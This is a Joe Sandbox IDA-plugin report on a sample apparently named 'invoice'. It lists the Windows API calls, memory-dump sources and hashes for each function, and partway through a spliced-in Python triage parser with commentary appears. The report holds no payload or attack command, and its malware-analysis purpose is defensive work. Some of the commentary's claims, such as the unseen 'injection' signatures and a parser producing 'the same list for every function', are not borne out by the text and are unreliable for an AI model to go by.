                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                        • GetClientRect.USER32(?,?), ref: 00FBB77B
                        • GetCursorPos.USER32(?), ref: 00FBB785
                        • ScreenToClient.USER32(?,?), ref: 00FBB790
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Client$CursorLongProcRectScreenWindow
                        • String ID:
                        • API String ID: 4127811313-0
                        • Opcode ID: 86a0b5a4586839b26e48f33f586fe6824246253886c0e52047dce9b5b7be2395
                        • Instruction ID: 2b7bb1f7d60c16a56b3fb5affa20413507b51b1aca96e40f2752eac82105f615
                        • Opcode Fuzzy Hash: 86a0b5a4586839b26e48f33f586fe6824246253886c0e52047dce9b5b7be2395
                        • Instruction Fuzzy Hash: 72118C36A0011AEFCB20EFA4D8859FE77BCFB05311F000556F941E3240C735BA52ABA5
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE1490
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14B5
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14BF
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00FE001E,?,00FE1071,?,00008000), ref: 00FE14F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: fc2808cfe28f9b26b508683e29f15d1de9b34d8e726013a7a969a1d51827f74d
                        • Instruction ID: 937aa834bf57ea30fe2861735aceca95b9606e801f9d1e2c68cf67e1794b959b
                        • Opcode Fuzzy Hash: fc2808cfe28f9b26b508683e29f15d1de9b34d8e726013a7a969a1d51827f74d
                        • Instruction Fuzzy Hash: B3112A32C0056ADBCF10EFA7D949AEEBB78FF0A711F014155E980B6384CB359590EBA1
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FDDB5C
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FDDB73
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FDDB88
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FDDBA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                        • Instruction ID: 33c2de0323db522a20b442373aa3bccecff08d12e702bb3e1e0b672d4775f687
                        • Opcode Fuzzy Hash: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                        • Instruction Fuzzy Hash: B511ADB1201305EBE3308F10DC48F96BBBDEB40B04F15855BAA96C7280DBB5E914ABA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: f3b71a3a7c30070453ada3509e91663b2499872346aefc6f7cde9d4372eb8c20
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: E6014B3645824EBBCF126E8ACC058EE3F26BF58354B598415FE5868131D336C9B1BFA1
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0100B318
                        • ScreenToClient.USER32(?,?), ref: 0100B330
                        • ScreenToClient.USER32(?,?), ref: 0100B354
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100B36F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                        • Instruction ID: 8a6887f9804e96136d8e505b5e637fd7d3db9d4fef5f8abc7549288d4a11666f
                        • Opcode Fuzzy Hash: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                        • Instruction Fuzzy Hash: A91144B9D0420AEFDB51DFA8C8849EEBBF9FF08210F108156E954E3214D735AA55DF90
                        APIs
                        • _memset.LIBCMT ref: 0100B678
                        • _memset.LIBCMT ref: 0100B687
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01046F20,01046F64), ref: 0100B6B6
                        • CloseHandle.KERNEL32 ref: 0100B6C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3277943733-0
                        • Opcode ID: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                        • Instruction ID: 8039f292f29fbed16e5f1b0cf888814d0eebcfd1057a990d149fe822a5a9da31
                        • Opcode Fuzzy Hash: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                        • Instruction Fuzzy Hash: 87F054F56403047FF2202765AC45F773A5CFB0A754F404020BAC8D5186E77B5C0097A8
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 00FE6C8F
                          • Part of subcall function 00FE776D: _memset.LIBCMT ref: 00FE77A2
                        • _memmove.LIBCMT ref: 00FE6CB2
                        • _memset.LIBCMT ref: 00FE6CBF
                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE6CCF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        • Opcode ID: d78f5d9f127c35e6d21f64684d1517879bc3bfe8b42b654c08681dc09ef262a0
                        • Instruction ID: c1c6d34c45cba95e5da1309470813efef05ffe67afba4c71a562d4e8616eb7fe
                        • Opcode Fuzzy Hash: d78f5d9f127c35e6d21f64684d1517879bc3bfe8b42b654c08681dc09ef262a0
                        • Instruction Fuzzy Hash: A1F0F47A204104ABCF517F55EC85E4ABB2AFF45360F148055FE099E21AC735A911EBB4
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA179
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA18C
                        • GetCurrentThreadId.KERNEL32 ref: 00FDA193
                        • AttachThreadInput.USER32(00000000), ref: 00FDA19A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                        • Instruction ID: bc21f21ccef139715d7ce55c40ec5a92f2e1497af95c8b2a143a70753e7a7399
                        • Opcode Fuzzy Hash: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                        • Instruction Fuzzy Hash: B5E03931545229BBDB315BB2DC0CED73F1CEF2A7A1F048016F548C4050CA768541EBA0
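The records above (for example the CreateProcessW call at 0100B6B6 and the SendMessageTimeoutW / AttachThreadInput sequence at 00FDA179-00FDA19A) are machine output from the Joe Sandbox IDA plugin, and a report this long is easier to triage once the per-function API sequences are pulled out of it. The following Python is an added example, not code from this report or from Joe Sandbox: it parses records in the layout shown here (an "APIs" heading, bullet lines of the form `Name.MODULE(args), ref: ADDR`, then the "Similarity" block), flags the API names a triager would look at first, and decodes the recorded dwCreationFlags of CreateProcessW to see whether CREATE_SUSPENDED was requested. The watchlist tags are my own choice of what is worth flagging, and the sample input is two records copied from this page.

```python
"""Parse Joe Sandbox IDA-plugin function records and rank them for triage.

Added example for this report; not Joe Sandbox code. Assumes the record
layout visible on this page: an "APIs" heading, bullets of the form
"• Name.MODULE(args), ref: ADDR" (optionally prefixed with
"Part of subcall function XXXX:"), and a "Similarity" block with API ID lines.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Sample input: two records copied from this report (the CreateProcessW and
# the AttachThreadInput functions), so the example runs offline.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0100B678
• _memset.LIBCMT ref: 0100B687
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01046F20,01046F64), ref: 0100B6B6
• CloseHandle.KERNEL32 ref: 0100B6C8
Memory Dump Source
• Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• API String ID: 3277943733-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA179
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA18C
• GetCurrentThreadId.KERNEL32 ref: 00FDA193
• AttachThreadInput.USER32(00000000), ref: 00FDA19A
Memory Dump Source
• Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• API String ID: 2710830443-0
"""

API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit checked below

# Assumed triage tags for the APIs seen in this report; extend as needed.
WATCHLIST = {
    "CreateProcessW": "process creation",
    "AttachThreadInput": "input attach to a foreign thread (window control)",
    "OpenProcessToken": "token access",
    "WNetUseConnectionW": "network share connection",
    "InternetCrackUrlW": "URL parsing",
    "RegisterTypeLib": "type library registration",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]        # raw argument strings; "?" = unresolved by the plugin
    ref: str               # call-site address
    subcall: bool = False  # True when reported from a called sub-function


@dataclass
class Record:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""


def parse_records(text: str) -> List[Record]:
    """Split the report text into per-function records with their API calls."""
    records: List[Record] = []
    cur: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                 # each function record starts here
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") is not None else []
            cur.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                     m.group("ref"), bool(m.group("sub"))))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
    return records


def create_process_suspended(rec: Record) -> Optional[bool]:
    """True/False if the record calls CreateProcessW/A with a recorded
    dwCreationFlags (6th argument); None when absent or unresolved ("?")."""
    for c in rec.calls:
        if c.name in ("CreateProcessW", "CreateProcessA") and len(c.args) > 5:
            flags = c.args[5]
            if flags == "?":
                return None
            return bool(int(flags, 16) & CREATE_SUSPENDED)
    return None


def triage(records: List[Record]) -> List[Tuple[str, List[str]]]:
    """Return (API ID, sorted tags) for every record touching a watchlisted API."""
    hits = []
    for rec in records:
        tags = sorted({WATCHLIST[c.name] for c in rec.calls if c.name in WATCHLIST})
        if tags:
            hits.append((rec.api_id, tags))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api_id, tags in triage(recs):
        print(api_id, "->", ", ".join(tags))
    print("CreateProcessW with CREATE_SUSPENDED:", create_process_suspended(recs[0]))
```

On the two records copied here, both functions are flagged, and the CreateProcessW check returns False: the recorded dwCreationFlags value is 0x20 (NORMAL_PRIORITY_CLASS) with bit 0x4 clear, so this particular function is not a suspended-process launcher of the kind used for classic process hollowing; the injection behaviour listed in the report's signatures has to be looked for in other functions. Running the parser over the whole report instead of the sample gives the same list for every function in the dump.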
                        APIs
                        • GetSysColor.USER32(00000008), ref: 00F82231
                        • SetTextColor.GDI32(?,000000FF), ref: 00F8223B
                        • SetBkMode.GDI32(?,00000001), ref: 00F82250
                        • GetStockObject.GDI32(00000005), ref: 00F82258
                        • GetWindowDC.USER32(?,00000000), ref: 00FBC003
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FBC010
                        • GetPixel.GDI32(00000000,?,00000000), ref: 00FBC029
                        • GetPixel.GDI32(00000000,00000000,?), ref: 00FBC042
                        • GetPixel.GDI32(00000000,?,?), ref: 00FBC062
                        • ReleaseDC.USER32(?,00000000), ref: 00FBC06D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        • Opcode ID: d80209e9326ab5d65a08c70917cbcc9cac61618852b8d99aa47f2036ca4c7dd7
                        • Instruction ID: 7d9905897b10cd01274d76cedb9138c8337bbc3f8d825dbd20e1827af535a72a
                        • Opcode Fuzzy Hash: d80209e9326ab5d65a08c70917cbcc9cac61618852b8d99aa47f2036ca4c7dd7
                        • Instruction Fuzzy Hash: FDE06D32500245ABEB725FB4FC0D7D83B10EB06332F008366FAA9880D587764A90EF11
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00FD8A43
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FD860E), ref: 00FD8A4A
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FD860E), ref: 00FD8A57
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FD860E), ref: 00FD8A5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                        • Instruction ID: ffa9682044de8bf43ed2a61bb7d7c9c28b30c2d44b77df0c28b0d0a968f97d7c
                        • Opcode Fuzzy Hash: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                        • Instruction Fuzzy Hash: C5E08636A01212EFD7309FB06D0DB563BACEF50BE2F048819B2C5C9048DA3D9542E750
                        APIs
                        • GetDesktopWindow.USER32 ref: 00FC20B6
                        • GetDC.USER32(00000000), ref: 00FC20C0
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC20E0
                        • ReleaseDC.USER32(?), ref: 00FC2101
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 4341cbe7f725aea4979f2fb06c038ed072c6fe26500cb473c24eb6f315d40de5
                        • Instruction ID: a2e037cb26172899c71c418726fa1f836b6a5b99b06a5bac2f0e33c875071d78
                        • Opcode Fuzzy Hash: 4341cbe7f725aea4979f2fb06c038ed072c6fe26500cb473c24eb6f315d40de5
                        • Instruction Fuzzy Hash: 2FE0E575800606EFCB62AFB0C808BAD7BB1EB4C310F108009F89A97210CB7D9141BF40
                        APIs
                        • GetDesktopWindow.USER32 ref: 00FC20CA
                        • GetDC.USER32(00000000), ref: 00FC20D4
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC20E0
                        • ReleaseDC.USER32(?), ref: 00FC2101
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 32182019ab5077fe91edd36b6767860c6a45f67fb4b7ffba17e835abd413f5aa
                        • Instruction ID: aecbb1659536800bf52c2029073025d3862f3a4dd4e43df65acca79e00ce3c7f
                        • Opcode Fuzzy Hash: 32182019ab5077fe91edd36b6767860c6a45f67fb4b7ffba17e835abd413f5aa
                        • Instruction Fuzzy Hash: 8CE012B5800606AFCB62AFB0C8086AD7BF1EB4C310F108009F99AA7210CB7E9141AF40
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 00FDB780
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        • Opcode ID: 1bc46cd09f91a579443404361459df217a722401c553788e85bc61f85edd41b5
                        • Instruction ID: ddc022c504af25e31f3d96287f1f6554864ebefc8e04b8b1db19a9921a410cf2
                        • Opcode Fuzzy Hash: 1bc46cd09f91a579443404361459df217a722401c553788e85bc61f85edd41b5
                        • Instruction Fuzzy Hash: FB9137B1600201EFDB14DF65C884B6ABBF9FF48710F19856EE9498B791DB70E841DB50
                        APIs
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • __wcsnicmp.LIBCMT ref: 00FEB0B9
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FEB182
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        • Opcode ID: 885767d962d7cc375b6af10a00dbf55a7d07fc92105f94f90f18c1c7e4848ce3
                        • Instruction ID: 48fcfb42a4d0a36ceb7dffaf41a407d0f4916326521712e50f037f263da77153
                        • Opcode Fuzzy Hash: 885767d962d7cc375b6af10a00dbf55a7d07fc92105f94f90f18c1c7e4848ce3
                        • Instruction Fuzzy Hash: 2761A072E04215AFCB14EF95C895EAFB7B5EF08320F14406AF546AB351DB74AE40EB90
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00F92AC8
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F92AE1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 6a614dbdf482077efabe16364251218395b6ade719f668414dd79b2352c8d064
                        • Instruction ID: b681c6e4b1806d5ce9d3303fad074b24568dfd0151c0fdea544e24f5f42941e5
                        • Opcode Fuzzy Hash: 6a614dbdf482077efabe16364251218395b6ade719f668414dd79b2352c8d064
                        • Instruction Fuzzy Hash: CA5165724187449BD320BF60DC86BABBBF8FB84314F55884CF1DA81095DBB98528DB66
                        APIs
                          • Part of subcall function 00F8506B: __fread_nolock.LIBCMT ref: 00F85089
                        • _wcscmp.LIBCMT ref: 00FE98CD
                        • _wcscmp.LIBCMT ref: 00FE98E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
